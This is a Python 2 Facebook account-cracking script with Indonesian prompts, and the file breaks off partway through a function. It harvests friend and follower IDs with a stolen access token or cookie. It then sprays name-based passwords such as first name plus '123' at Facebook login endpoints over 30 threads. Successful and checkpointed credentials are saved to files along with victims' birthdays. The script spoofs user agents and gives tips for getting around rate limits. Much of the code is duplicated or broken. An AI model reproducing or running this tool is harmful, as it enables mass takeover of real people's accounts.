# -*- coding: utf-8
# Made With RATU ERROR
# facebook : https://web.facebook.com/hasni.hamunkhantethapmumhun
# facebook unik : https://web.facebook.com/hasni.hamunkhantethapmumhun
# github : https://github.com/RATUCOLMEXS
import os
import sys
import time
import datetime
import random
import hashlib
import re
import threading
import json
import urllib
import cookielib
import requests
import uuid
import ipaddress
import calendar
from multiprocessing.pool import ThreadPool
from requests.exceptions import ConnectionError
from bs4 import BeautifulSoup as par
from time import sleep
from datetime import datetime
from datetime import date
if ("linux" in sys.platform.lower()):
		P = "\x1b[0;37m" 
		M = "\x1b[0;31m" 
		H = "\x1b[0;32m"
		K = "\x1b[0;33m"
		B = "\x1b[0;34m"
		U = "\x1b[0;35m"
		O = "\x1b[0;36m" 
		N = "\x1b[0m" 
else:
		P =''
		M =''
		H =''
		K =''
		B =''
		U =''
		O =''
		N =''
def keluar():
    print('\x1b[1;91m[!] Keluar')
    os.sys.exit()

back = 0
threads = []
berhasil = []
cekpoint = []
gagal = []
idteman = []
idfromteman = []
idmem = []
id = []
em = []
emfromteman = []
hp = []
hpfromteman = []
reaksi = []
reaksigrup = []
komen = []
komengrup = []
listgrup = []
vulnot = '\x1b[31mNot Vuln'
vuln = '\x1b[32mVuln'

try:
	import requests
except ImportError:
	print('[×] Modul requests belum terinstall!...\n')
	os.system('pip install requests' if os.name == 'nt' else 'pip2 install requests')
reload(sys)
sys.setdefaultencoding('utf8')
ip = requests.get('https://api.ipify.org').text

MAX_IPV4 = ipaddress.IPv4Address._ALL_ONES  # 2 ** 32 - 1
MAX_IPV6 = ipaddress.IPv6Address._ALL_ONES  # 2 ** 128 - 1

def random_ipv4():
	return  ipaddress.IPv4Address._string_from_ip_int(random.randint(0, MAX_IPV4))
def random_ipv6():
	return ipaddress.IPv6Address._string_from_ip_int(random.randint(0, MAX_IPV6))

def banner():                
	print
	print
	print
	jalan ('                \33[3;1m\033[1;97mW e l c o m e  T o\33[0;1m')
	print
	jalan ('       \033[1;96m[\33[37;1mR\033[1;96m] \033[1;96m[\033[1;97mA\033[1;96m] \033[1;96m[\033[1;97mT\033[1;96m] \033[1;96m[\033[1;97mU\033[1;96m]  \033[1;96m[\033[1;97mE\033[1;96m] \033[1;96m[\033[1;97mR\033[1;96m] \033[1;96m[\33[37;1mR\033[1;96m] \033[1;96m[\033[1;97mO\033[1;96m] \033[1;96m[\033[1;97mR\033[1;96m]\033[1;96m')
	print (' \033[1;96m  ____________________________________________')
	print ('\033[1;97m\033[1;96m ¤\033[1;97m{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}{}\033[1;96m¤')

id = []
cp = []
ok = []
loop = 0

ct = datetime.now()
n = ct.month
bulan1 = [    'Januari',   'Februari',    'Maret',    'April',    'Mei',    'Juni',    'Juli',    'Agustus',    'September',    'Oktober',    'Nopember',    'Desember']
   
try:
    if n < 0 or n > 12:
        exit()
    nTemp = n - 1
except ValueError:
    exit()
    
s = requests.Session()
current = datetime.now()
ta = current.year
bu = current.month
ha = current.day
op = bulan1[nTemp]
reload(sys)
sys.setdefaultencoding('utf-8')
my_date = date.today()
hr = calendar.day_name[my_date.weekday()]
tanggal = ("%s-%s-%s-%s"%(hr, ha, op, ta))
tgl = ("%s %s %s"%(ha, op, ta))
bulan = {
        "01": "Januari",
        "02": "Februari",
        "03": "Maret",
        "04": "April",
        "05": "Mei",
        "06": "Juni",
        "07": "Juli",
        "08": "Agustus",
        "09": "September",
        "10": "November",
        "11": "Oktober",
        "12": "Desember"
}

mb = "https://mbasic.facebook.com"
color = lambda col: "\x1b[1;"+str(col)+"m"

mb = "https://mbasic.facebook.com"
color = lambda col: "\x1b[1;"+str(col)+"m"

def check_in(uid, pw):
	ua = "Mozilla/5.0 (SymbianOS/9.3; Series60/3.2 NokiaE5-00/071.003; Profile/MIDP-2.1 Configuration/CLDC-1.1 ) AppleWebKit/533.4 (KHTML, like Gecko) NokiaBrowser/7.3.1.26 Mobile Safari/533.4 3gpp-gba"
	ses = requests.Session()
	ses.headers.update({
	"Host": "mbasic.facebook.com",
	"cache-control": "max-age=0",
	"upgrade-insecure-requests": "1",
	"origin": mb,
	"content-type": "application/x-www-form-urlencoded",
	"user-agent": ua,
	"accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9",
	"x-requested-with": "mark.via.gp",
	"sec-fetch-site": "same-origin",
	"sec-fetch-mode": "navigate",
	"sec-fetch-user": "?1",
	"sec-fetch-dest": "document",
	"referer": mb+"/login/?next&ref=dbl&fl&refid=8",
	"accept-encoding": "gzip, deflate",
	"accept-language": "id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7"
	})
	data = {}
	ged = par(ses.get(mb+"/login/?next&ref=dbl&fl&refid=8", headers={"user-agent":ua}).text, "html.parser")
	fm = ged.find("form",{"method":"post"})
	list = ["lsd","jazoest","m_ts","li","try_number","unrecognized_tries","login","bi_xrwh"]
	for i in fm.find_all("input"):
		if i.get("name") in list:
			data.update({i.get("name"):i.get("value")})
		else:
			continue
	data.update({"email":uid,"pass":pw})
	try:
		run = par(ses.post(mb+fm.get("action"), data=data, allow_redirects=True).text, "html.parser")
	except r.exceptions.TooManyRedirects:
		print(" [!] Redirect overload")
	if "c_user" in ses.cookies:
		print(" [✓] akun ini tidak checkpoint")
	elif "checkpoint" in ses.cookies:
		form = run.find("form")
		dtsg = form.find("input",{"name":"fb_dtsg"})["value"]
		jzst = form.find("input",{"name":"jazoest"})["value"]
		nh   = form.find("input",{"name":"nh"})["value"]
		dataD = {
			"fb_dtsg": dtsg,
			"fb_dtsg": dtsg,
			"jazoest": jzst,
			"jazoest": jzst,
			"checkpoint_data":"",
			"submit[Continue]":"Lanjutkan",
			"nh": nh
		}
		xnxx = par(ses.post(mb+form["action"], data=dataD).text, "html.parser")
		ngew = [yy.text for yy in xnxx.find_all("option")]
		print(" \033[1;96m[\033[1;97m!\033[1;96m]\033[1;97m tersedia "+str(len(ngew))+" opsi ")
		for opt in range(len(ngew)):
			print" "*3, str(opt+1)+". "+ngew[opt]
	elif "login_error" in str(run):
		oh = run.find("div",{"id":"login_error"}).find("div").text
		print(" \033[1;96m[\033[1;97m!\033[1;96m]\033[1;97m "+oh)
	else:
		print(" \033[1;96m[\033[1;97m!\033[1;96m]\033[1;97m login gagal, silahkan cek kembali id dan password")

def buatngecek():
	print(" \033[1;96m[\033[1;97m?\033[1;96m]\033[1;97m masukan format CP/namafile")
	dirs = os.listdir("CP")
	print("")
	for file in dirs:
		print(" \033[1;96m[\033[1;97m×\033[1;96m]\033[1;97m "+file)
	files = raw_input("\n \033[1;96m[\033[1;97m?\033[1;96m]\033[1;96m Pilih file \033[1;97m:\033[1;93m ")
	try:
		buka_baju = open(files,"r").readlines()
	except FileNotFoundError:
		print(" \033[1;96m[\033[1;97m×\033[1;96m]\033[1;97m File tidak ada")
		time.sleep(2); main()
	print(" \033[1;96m[\033[1;97m+\033[1;96m]\033[1;96m Total Akun \033[1;97m:\033[1;93m "+str(len(buka_baju)))
	print("\033[1;96m¤"*48)
	for memek in buka_baju:
		kontol = memek.replace("\n","")
		titid  = kontol.split("|")
		print(" \033[1;96m[\033[1;97m×\033[1;96m]\033[1;97m check: "+kontol)
		try:
			check_in(titid[0], titid[1])
		except requests.exceptions.ConnectionError:
			continue
		print("\033[1;96m¤"*48)
	print("\033[1;96m¤"*48)
	print("")
	exit(" \33[3;1m\033[1;97mSelesai.....jangan lupa \33[0;1m\033[1;93mCOLMEX's \033[1;97m")
	
def cekakun():
	print'\n \033[1;96m[\033[1;97m1\033[1;96m]\033[1;97m lihat hasil crack \033[1;92mOK '
	print' \033[1;96m[\033[1;97m1\033[1;96m]\033[1;97m lihat hasil crack CP '
	anjg = raw_input('\n \033[1;96m[\033[1;97m1\033[1;96m] Pilih\033[1;97m : ')
	if anjg == '':
		menu()
	elif anjg == "1":
		dirs = os.listdir("OK")
		print""
		for file in dirs:
			print(" [*] "+file)
		try:
			file = raw_input("\n [?] mau lihat hasil yang mana ?: ")
			if file == "":
				menu()
			totalok = open("OK/%s"%(file)).read().splitlines()
		except IOError:
			exit(" [!] file %s tidak tersedia"%(file))
		nm_file = ("%s"%(file)).replace("-", " ")
		del_txt = nm_file.replace(".txt", "")
		print("\n *-------------------------------------------------*")
		print(" [+] tanggal : %s -total : %s"%(del_txt, len(totalok)))
		print""
		os.system("cat OK/%s"%(file))
		raw_input("\n [*] tekan ENTER untuk kembali ke menu")
		menu()
	elif anjg == "2":
		dirs = os.listdir("CP")
		print""
		for file in dirs:
			print(" [*] "+file)
		try:
			file = raw_input("\n [?] mau lihat hasil yang mana ?: ")
			if file == "":
				menu()
			totalcp = open("CP/%s"%(file)).read().splitlines()
		except IOError:
			exit(" [!] file %s tidak tersedia"%(file))
		nm_file = ("%s"%(file)).replace("-", " ")
		del_txt = nm_file.replace(".txt", "")
		print("\n *-------------------------------------------------*")
		print(" [+] tanggal : %s -total : %s"%(del_txt, len(totalcp)))
		print""
		os.system("cat CP/%s"%(file))
		raw_input("\n\n [*] tekan ENTER untuk kembali ke menu ")
		menu()
	else:
		menu()
		
#------->login token jangan lupa masukin token facebook jangan token listrik kontol<-------#    
def pilihlogin():
	os.system("clear")
	try:
		token = open('login.txt','r')
		menu()
	except (KeyError,IOError):
		logo()
		print
		print("\033[1;96m[\033[1;97m01\033[1;96m] \033[1;97mLogin via TOKEN")
		print("\033[1;96m[\033[1;97m02\033[1;96m] \033[1;97mLogin via COOKIE")
		print("\033[1;96m[\033[1;97m03\033[1;96m] \033[1;97mVideo cara mengambil TOKEN")
		print("\033[1;96m[\033[1;97m04\033[1;96m] \033[1;97mVideo cara mengambil COOKIE")
		bct = raw_input("\n\033[1;96m[\033[1;97m?\033[1;96m] PILIH :\033[1;93m ")
		if bct == "":
			pilihlogin()
		elif bct == "1":
			tokenz()
		elif bct == "2":
			gen()
		elif bct == "3":
			os.system("xdg-open https://www.youtube.com/watch?v=6XJdBTc7rf0&t=4s")
		elif bct == "4":
			os.system("xdg-open https://www.youtube.com/watch?v=6XJdBTc7rf0&t=4s")
def gen():
	os.system("clear")
	try:
		token = open('login.txt', 'r')
		menu()
	except (KeyError, IOError):
		logo()
		print("")
	cookie = raw_input("%s\033[1;97m [\033[1;96m+\033[1;97m] \033[1;96mMasukkan Cookies \033[1;97m: %s"%(P,P))
	if cookie in ['',' ']:
		print("\n%s harap isi cookie nya jangan kosong"%(P))
		gen()
	if cookie in ['tutor','Tutor','TUTOR']:
		os.system(" ")
	try:
		data = requests.get('https://business.facebook.com/business_locations', headers = {
					'user-agent'                : 'Mozilla/5.0 (iPhone; CPU iPhone OS 15_3_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/19D52 [FBAN/FBIOS;FBAV/354.0.0.29.106;FBBV/351086310;FBDV/iPhone12,3;FBMD/iPhone;FBSN/iOS;FBSV/15.3.1;FBSS/3;FBID/phone;FBLC/it_IT;FBOP/5;FBRV/352194681]',
					'referer'                   : 'https://www.facebook.com/',
					'host'                      : 'business.facebook.com',
					'origin'                    : 'https://business.facebook.com',
					'upgrade-insecure-requests' : '1',
					'accept-language'           : 'id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7',
					'cache-control'             : 'max-age=0',
					'accept'                    : 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
					'content-type'              : 'text/html; charset=utf-8'
		}, cookies = {
					'cookie'                    : cookie
		 })
		find_token = re.search('(EAAG\w+)', data.text)
		if find_token is None:
			print("%s cookies anda invalid"%(M))
			gen()
		open('login.txt','w').write(find_token.group(1))
		try:
			ikeh = requests.get('https://graph.facebook.com/me/?access_token=%s'%(find_token.group(1))).json()
			print("%s + cookie anda valid"%(P))
			os.system("clear")
			print("\n + hello : %s%s %sanak  ngentod"%(K,ikeh["name"].lower(),P))
			menu()
		except (KeyError):
			print("%s\n + token anda invalid"%(M))
			gen()
	except (AttributeError,UnboundLocalError):
		print("%s\n + cookie anda invalid"%(M))
		gen()
	except (ConnectionError):
		print("%s\n + koneksi anda jelek"%(P))
                            
def tokenz():
	os.system('clear')
	try:
		token = open('login.txt', 'r')
		menu()
	except (KeyError, IOError):
		os.system('clear')
		print
		logo()
		token = raw_input('\n\033[1;97m [\033[1;96m+\033[1;97m] \033[1;96mMasukkan Token \033[1;97m: ')
		try:
			otw = requests.get('https://graph.facebook.com/me?access_token='+token)
			a = json.loads(otw.text)
			zedd = open('login.txt', 'w')
			zedd.write(token)
			zedd.close()
			menu()
		except KeyError:
			print("[!] Token Invalid!")
			sys.exit()
			
def xxnx():
    try:
        toket = open('licensed.log', 'r').read()
    except IOError:
        print ('\x1b[1;91m License Invalid !')
        os.system('clear')
        os.system('rm -rf licensed.log')
        lisen()

    if os.path.exists('licensed.log'):
        user1()
    else:
        lisen()

def xxnx():
    try:
        toket = open('licensed.log', 'r').read()
    except IOError:
        print ('\x1b[1;91m License Invalid !')
        os.system('clear')
        os.system('rm -rf licensed.log')
        lisen()

    if os.path.exists('licensed.log'):
        user1()
    else:
        lisen()

def xxnx():
    try:
        toket = open('licensed.log', 'r').read()
    except IOError:
        print '\x1b[1;91m License Invalid !'
        os.system('clear')
        os.system('rm -rf licensed.log')
        lisen()

    if os.path.exists('licensed.log'):
        user1()
    else:
        lisen()

useragents = 'Mozilla/5.0 (iPhone; CPU iPhone OS 15_3_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/19D52 [FBAN/FBIOS;FBAV/354.0.0.29.106;FBBV/351086310;FBDV/iPhone12,3;FBMD/iPhone;FBSN/iOS;FBSV/15.3.1;FBSS/3;FBID/phone;FBLC/it_IT;FBOP/5;FBRV/352194681]'
#------->menu crack india<-------#
def menu():
	os.system('clear')
	global token
	try:
		token = open('login.txt','r').read()
		otw = requests.get('https://graph.facebook.com/me/?access_token='+token)
		a = json.loads(otw.text)
		nama = a['name']
		id = a['id']
	except KeyError:
		os.system('clear')
		print (' [!] Token Invalid')
		os.system("rm -f login.txt")
		menu()
	except requests.exceptions.ConnectionError:
		print ('  [!] Tidak Ada Koneksi')
		sys.exit()
		    
	banner()
	print
	print
	
	print
	print" \033[1;96m[\033[1;97m01\033[1;96m] \033[1;97mCek ID"
	print" \033[1;97m[\033[1;96m00\033[1;97m] \033[1;96mRemove TOKEN/COOKIE"
	print
	pilih_india()

def pilih_india():
	ask = raw_input(" \033[1;96m[\033[1;97m?\033[1;96m] \033[1;96mPILIH \033[1;97m:\033[1;93m ")
	if ask == "":
		print
		print ("\033[1;97mpilih yang benar.......!!!") 
		exit()
	elif ask == "1" or ask == "01":
		print ("\n \033[1;97mketik '\33[3;1m\033[1;96mme\033[1;97m' \33[0;1mjika ingin crack dari daftar pencarian teman")
		print
		idt = raw_input(" \033[1;96m[\033[1;97m?\033[1;96m] \033[1;97mid publik :\033[1;93m ")
		try:
			pok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+token)
			sp = json.loads(pok.text)
			print (" \033[1;96m[\033[1;97m!\033[1;96m]\033[1;97m nama      :\033[1;93m "+sp["name"]) 
		except KeyError:
			print ("     \033[1;97mmaaf id tidak publik") 
			exit()
		r = requests.get("https://graph.facebook.com/"+idt+"?fields=friends.fields(id,name)&access_token="+token)
		z = json.loads(r.text)["friends"]
		for i in z["data"]:
			id.append(i["id"]+"<=>"+i["name"])
	elif ask == "2" or ask == "02":
		print ("\n \033[1;97mketik '\33[3;1m\033[1;96mme\033[1;97m' \33[0;1mjika ingin crack dari daftar pencarian teman")
		print
		idt = raw_input(" \033[1;96m[\033[1;97m?\033[1;96m] \033[1;97mid publik :\033[1;93m ")
		try:
			pok = requests.get("https://graph.facebook.com/"+idt+"?access_token="+token)
			sp = json.loads(pok.text)
			print (" \033[1;96m[\033[1;97m!\033[1;96m]\033[1;97m nama      :\033[1;93m "+sp["name"]) 
		except KeyError:
			print ("     \033[1;97mmaaf id tidak publik") 
			exit()
		r = requests.get("https://graph.facebook.com/"+idt+"/subscribers?limit=999999&access_token="+token)
		z = json.loads(r.text)
		for i in z["data"]:
			id.append(i["id"]+"<=>"+i["name"])
	elif ask == "3" or ask == "03":
		idt = raw_input(" \033[1;96m[\033[1;97m?\033[1;96m] \033[1;97mid publik :\033[1;93m ")
		r = requests.get("https://graph.facebook.com/"+idt+"/likes?limit=9999999&access_token="+token)
		z = json.loads(r.text)
		for i in z['data']:
			uid = i['id']
			na = i['name']
			nm = na.rsplit(" ")[0]
			id.append(uid+'|'+nm)
	elif ask == "4" or ask == "04":
		menu_hack()	    
	elif ask == "5" or ask == "05":
		print
		print" \033[1;96m[\033[1;97m1\033[1;96m]\033[1;97m lihat hasil \033[1;97m[\033[1;96mOK\033[1;97m]"
		print" \033[1;96m[\033[1;97m2\033[1;96m]\033[1;97m lihat hasil \033[1;96m[\033[1;97mCP\033[1;96m]"
		ress = raw_input(" \033[1;96m[\033[1;97m?\033[1;96m]\033[1;96m pilih \033[1;96m:\033[1;93m ")
		if ress =="":
			menu()
		elif ress == "1" or ress == "01":
			print ("\n [+] hasil \033[1;97[\033[1;96mOK\033[1;97]\033[1;97m tanggal : \033[1;96m%s-%s-%s\033[0;97m" % (ha, op, ta)) 
			os.system("cat out/OK-%s-%s-%s.txt" % (ha, op, ta))
			exit()
		elif ress == "2" or ress == "02":
			print (" [+] hasil \033[1;96m[\033[1;97mCP\033[1;96m]\033[1;97m tanggal : \033[1;96m%s-%s-%s\033[0;97m" % (ha, op, ta)) 
			os.system("cat out/CP-%s-%s-%s.txt" % (ha, op, ta))
			exit()
	elif ask == "6" or ask == "06":
		buatngecek()
	elif ask == "1" or ask == "01":
		print
		print("\033[1;96m [\033[1;97m1\033[1;96m]\033[1;97m Cek ID teman ")
		print("\033[1;96m [\033[1;97m2\033[1;96m]\033[1;97m Cek ID publik ")
		d = raw_input("\n\033[1;96m [\033[1;97m?\033[1;96m] \033[1;96mpilih \033[1;96m:\033[1;93m ")
		if d =='': 
			exit()
		elif d in['1','01']:
			id_teman1()
		elif d in['2','02']:
			idfrom_teman1()
		else:
			print ("\033[1;97mpilih yang benar.......!!!") 
			exit()
	elif ask == "8" or ask == "08":
		 menu_bot()
	elif ask == "9" or ask == "09":
		menu_spam()
	elif ask == "0" or ask == "00":
		os.system("rm -f login.txt") 
		print (" √   berhasil menghapus token") 
		exit()		
		
	else:
		print ("\033[1;97mpilih yang benar.......!!!") 
		exit()
	
	print"\033[1;96m [\033[1;97m!\033[1;96m]\033[1;97m total id  :\033[1;93m " +str(len(id))
	ask = raw_input("\n \033[1;96m[\033[1;97m?\033[1;96m]\033[1;97m ingin gunakan password manual (\033[1;92my\033[1;97m/\033[1;93mt\033[1;97m) : ")
	if ask == "Y" or ask == "y":
		manual()
	if ask == "T" or ask == "t":
		auto()
	print
	print (" \033[1;97mmainkan data mode pesawat")
	print (" \033[1;97mdi angka \033[1;96m100 \033[1;97mdan \033[1;96m2000 \033[1;97msaat menjalankan crack")
	print(" \033[1;97mProses crack \33[3;1m\033[1;92msedang berjalan...\33[0;1m")
	print
	
from random import choice as pilih
def auto():
	print("")
	def main(user):
		global ok,cp,ua, loop
		pwx = []
		print '\r \033[1;97m¤  %s/%s \033[1;97m[\033[1;96mOK:%s\033[1;97m] - \033[1;96m[\033[1;97mCP:%s\033[1;96m]\033[1;97m ' % (loop, len(id), len(ok), len(cp)),
		sys.stdout.flush()
		try:os.mkdir("out")
		except OSError:pass
		uid, name = user.split("<=>")
		na = name.split(" ")
		if len(na) == 3 or len(na) == 4 or len(na) == 5 or len(na) == 6:
				pwx = [name, na[0]+"123", na[0]+"1234", na[0]+"12345"]
		else:
				pwx = [name, na[0]+"123", na[0]+"1234", na[0]+"12345"]
		try:
			for pw in pwx:

				pw = pw.lower()
				user_gg = pilih([
					"NokiaC3-00/5.0 (08.63) Profile/MIDP-2.1 Configuration/CLDC-1.1 Mozilla/5.0 AppleWebKit/420+ (KHTML, like Gecko) Safari/420+",
					"Mozilla/5.0 (Linux; Android 12; SAMSUNG SM-G780G) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/16.0 Chrome/92.0.4515.166 Mobile Safari/537.36"
				])
				session = requests.Session()
				session.headers.update({"Host":"m.facebook.com","upgrade-insecure-requests":"1","user-agent":user_gg,"accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*[inserted by cython to avoid comment closer]/[inserted by cython to avoid comment start]*;q=0.8,application/signed-exchange;v=b3;q=0.9","dnt":"1","x-requested-with":"mark.via.gp","sec-fetch-site":"none","sec-fetch-mode":"navigate","sec-fetch-user":"?1","sec-fetch-dest":"document","referer":"https://developers.facebook.com/","accept-encoding":"gzip, deflate","accept-language":"id-ID,id;q=0.9,en-US;q=0.8,en;q=0.7"})
				p = session.get('https://m.facebook.com/index.php?next=https%3A%2F%2Fdevelopers.facebook.com%2Ftools%2Fdebug%2Faccesstoken%2F').text
				dataa ={"lsd":re.search('name="lsd" value="(.*?)"', str(p)).group(1),"jazoest":re.search('name="jazoest" value="(.*?)"', str(p)).group(1),"uid":uid,"flow":"login_no_pin","pass":pw,"next":"https://developers.facebook.com/tools/debug/accesstoken/"}
				po = session.post('https://m.facebook.com/login/device-based/validate-password/?shbl=0',data=dataa,allow_redirects=False)
				if 'c_user' in session.cookies.get_dict():
					print '\r\033[1;97m 👉 \033[1;97m[\033[1;96mOK\033[1;97m]\033[1;96m\033[1;96m ' +uid+ ' \033[1;97m◊\033[1;96m ' +pw+ '        '
					ok.append(uid+' • '+pw)
					save = open('out/OK-%s-%s-%s.txt' % (ha, op, ta),'a') 
					save.write('\033[1;97m 👉 \033[1;97m[\033[1;96mOK\033[1;97m]\033[1;96m\033[1;96m '+str(uid)+' \033[1;97m◊\033[1;96m '+str(pw)+'\n')
					save.close()
					break
				elif 'checkpoint' in session.cookies.get_dict():
					try:
						token = open('login.txt').read()
						url = ("https://graph.facebook.com/"+uid+"?access_token="+token)
						data = s.get(url).json()
						nama = data['name']
						ttl = data['birthday'].replace("/","-")
						print('\r\033[0;97m 👉 \033[1;96m[\033[1;97mCP\033[1;96m]\033[1;97m\033[1;97m ' +uid+ ' \033[1;96m◊\033[1;97m ' + pw + ' \033[1;96m◊\033[1;97m ' + ttl)
						cp.append(uid+'|'+pw+'|'+ttl)
						save = open('out/CP-%s-%s-%s.txt' % (ha, op, ta),'a')
						save.write('\033[0;97m 👉 \033[1;96m[\033[1;97mCP\033[1;96m]\033[1;97m\033[1;97m '+str(uid)+' \033[1;96m◊\033[1;97m '+str(pw)+' \033[1;96m◊\033[1;97m '+ttl+'\n')
						open("CP/%s.txt"%(tanggal),"a").write("%s|%s|%s\n"%(uid, pw, ttl))
						save.close()
						break
					except(KeyError, IOError):
						ttl = ' '
					except:pass
					print '\r\033[0;97m 👉 \033[1;96m[\033[1;97mCP\033[1;96m]\033[1;97m\033[1;97m ' +uid+ ' \033[1;96m◊\033[1;97m ' + pw + '        '
					cp.append(uid+'|'+pw)
					save = open('out/CP-%s-%s-%s.txt' % (ha, op, ta),'a')
					save.write('\033[0;97m 👉 \033[1;96m[\033[1;97mCP\033[1;96m]\033[1;97m\033[1;97m '+str(uid)+' \033[1;96m◊\033[1;97m '+str(pw)+'\n')
					open("CP/%s.txt"%(tanggal),"a").write(" %s|%s\n"%(uid, pw))
					save.close()
					break
			
			loop += 1
		except:
			pass
	p = ThreadPool(30)
	p.map(main, id)
	print("\n crack selesai...")
	print
	print
	exit()
def auto_B_API():
	print("")
	def main(user):
		global ok,cp,ua, loop
		pwx = []
		print '\r \033[1;97m¤  %s/%s \033[1;97m[\033[1;96mOK:%s\033[1;97m] - \033[1;96m[\033[1;97mCP:%s\033[1;96m]\033[1;97m ' % (loop, len(id), len(ok), len(cp)),
		sys.stdout.flush()
		try:os.mkdir("out")
		except OSError:pass
		uid, name = user.split("<=>")
		na = name.split(" ")
		if len(na) == 3 or len(na) == 4 or len(na) == 5 or len(na) == 6:
				pwx = [na[0]+"123", na[0]+"12345"]
		else:
				pwx = [na[0]+"123", na[0]+"12345"]
		try:
			for pw in pwx:
				pw = pw.lower()
				ua = random.choice(["Mozilla/5.0 (iPhone; CPU iPhone OS 15_3_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Mobile/19D52 [FBAN/FBIOS;FBAV/354.0.0.29.106;FBBV/351086310;FBDV/iPhone12,3;FBMD/iPhone;FBSN/iOS;FBSV/15.3.1;FBSS/3;FBID/phone;FBLC/it_IT;FBOP/5;FBRV/352194681]"])
				ses = requests.Session()
				headers_ = {"x-fb-connection-bandwidth": str(random.randint(20000000.0, 30000000.0)), "x-fb-sim-hni": str(random.randint(20000, 40000)), "x-fb-net-hni": str(random.randint(20000, 40000)), "x-fb-connection-quality": "EXCELLENT", "x-fb-connection-type": "cell.CTRadioAccessTechnologyHSDPA", "user-agent": ua, "content-type": "application/x-www-form-urlencoded", "x-fb-http-engine": "Liger"}
				send = ses.get('https://b-api.facebook.com/method/auth.login?format=json&email=' + uid + '&password=' + pw + '&credentials_type=device_based_login_password&generate_session_cookies=1&error_detail_type=button_with_disabled&source=device_based_login&meta_inf_fbmeta=%20&currently_logged_in_userid=0&method=GET&locale=en_US&client_country_code=US&fb_api_caller_class=com.facebook.fos.headersv2.fb4aorca.HeadersV2ConfigFetchRequestHandler&access_token=350685531728|62f8ce9f74b12f84c123cc23437a4a32&fb_api_req_friendly_name=authenticate&cpl=true', headers=headers_)
				if "access_token" in send.text and "EAAA" in send.text:
					print '\r\033[1;97m 👉 \033[1;97m[\033[1;96mOK\033[1;97m]\033[1;96m\033[1;96m ' +uid+ ' \033[1;97m◊\033[1;96m ' +pw+ '        '
					ok.append(uid+' • '+pw)
					save = open('out/OK-%s-%s-%s.txt' % (ha, op, ta),'a') 
					save.write('\033[1;97m 👉 \033[1;97m[\033[1;96mOK\033[1;97m]\033[1;96m\033[1;96m '+str(uid)+' \033[1;97m◊\033[1;96m '+str(pw)+'\n')
					save.close()
					break
					continue
					continue
				elif "www.facebook.com" in send.json()["error_msg"]:
					try:
						token = open('login.txt').read()
						url = ("https://graph.facebook.com/"+uid+"?access_token="+token)
						data = s.get(url).json()
						nama = data['name']
						ttl = data['birthday'].replace("/","-")
						print('\r\033[0;97m 👉 \033[1;96m[\033[1;97mCP\033[1;96m]\033[1;97m\033[1;97m ' +uid+ ' \033[1;96m◊\033[1;97m ' + pw + ' \033[1;96m◊\033[1;97m ' + ttl)
						cp.append(uid+'|'+pw+'|'+ttl)
						save = open('out/CP-%s-%s-%s.txt' % (ha, op, ta),'a')
						save.write('\033[0;97m 👉 \033[1;96m[\033[1;97mCP\033[1;96m]\033[1;97m\033[1;97m '+str(uid)+' \033[1;96m◊\033[1;97m '+str(pw)+' \033[1;96m◊\033[1;97m '+ttl+'\n')
						open("CP/%s.txt"%(tanggal),"a").write("%s|%s|%s\n"%(uid, pw, ttl))
						save.close()
						break
					except(KeyError, IOError):
						ttl = ' '
					except:pass
					print '\r\033[0;97m 👉 \033[1;96m[\033[1;97mCP\033[1;96m]\033[1;97m\033[1;97m ' +uid+ ' \033[1;96m◊\033[1;97m ' + pw + '        '
					cp.append(uid+'|'+pw)
					save = open('out/CP-%s-%s-%s.txt' % (ha, op, ta),'a')
					save.write('\033[0;97m 👉 \033[1;96m[\033[1;97mCP\033[1;96m]\033[1;97m\033[1;97m '+str(uid)+' \033[1;96m◊\033[1;97m '+str(pw)+'\n')
					open("CP/%s.txt"%(tanggal),"a").write(" %s|%s\n"%(uid, pw))
					save.close()
					break
					continue
			
			loop += 1
		except:
			pass
	p = ThreadPool(30)
	p.map(main, id)
	print("\n crack selesai...")
	print
	print
	exit()

def manual():
	print("\033[1;96m [\033[1;97m*\033[1;96m] \033[1;97mcontoh password : bangladesh,102030,786786")
	pw = raw_input("\033[1;96m [\033[1;97m!\033[1;96m]\033[1;97m set password :\033[1;93m ").split(",")
	print
	if len(pw) ==0:
		exit(" *  isi yang bener, tidak boleh kosong")
	print("\033[1;97m jumlah password yang di buat : \033[1;93m" +str(len(pw)))
	print (" \033[1;97mmainkan data mode pesawat")
	print (" \033[1;97mdi angka \033[1;96m100 \033[1;97mdan \033[1;96m2000 \033[1;97msaat menjalankan crack")
	print(" \033[1;97mProses crack \33[3;1m\033[1;92msedang berjalan...\33[0;1m")
	print
	
	def main(arg):
		global ok,cp,ua,loop
		print '\r \033[1;97m¤  %s/%s \033[1;97m[\033[1;96mOK:%s\033[1;97m] - \033[1;96m[\033[1;97mCP:%s\033[1;96m]\033[1;97m ' % (loop, len(id), len(ok), len(cp)),
		sys.stdout.flush()
		user = arg
		uid,name=user.split("|") 
		try:
			os.mkdir('out')
		except OSError:
			pass
		try:
			for asu in pw:
				ua = 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36'
				headers_ = {'x-fb-connection-bandwidth': str(random.randint(20000000.0, 30000000.0)), 'x-fb-sim-hni': str(random.randint(20000, 40000)), 
				'x-fb-net-hni': str(random.randint(20000, 40000)), 
				'x-fb-connection-quality': 'EXCELLENT', 
				'x-fb-connection-type': 'cell.CTRadioAccessTechnologyHSDPA', 
				'user-agent': ua, 
				'content-type': 'application/x-www-form-urlencoded', 
				'x-fb-http-engine': 'Liger'}
				ses=requests.Session()
				api="https://b-api.facebook.com/method/auth.login"
				param={"access_token": "350685531728%7C62f8ce9f74b12f84c123cc23437a4a32","format": "JSON","sdk_version": "2","email":uid,"locale": "en_US","password":asu,"sdk": "ios","generate_session_cookies": "1","sig": "3f555f99fb61fcd7aa0c44f58f522ef6"}
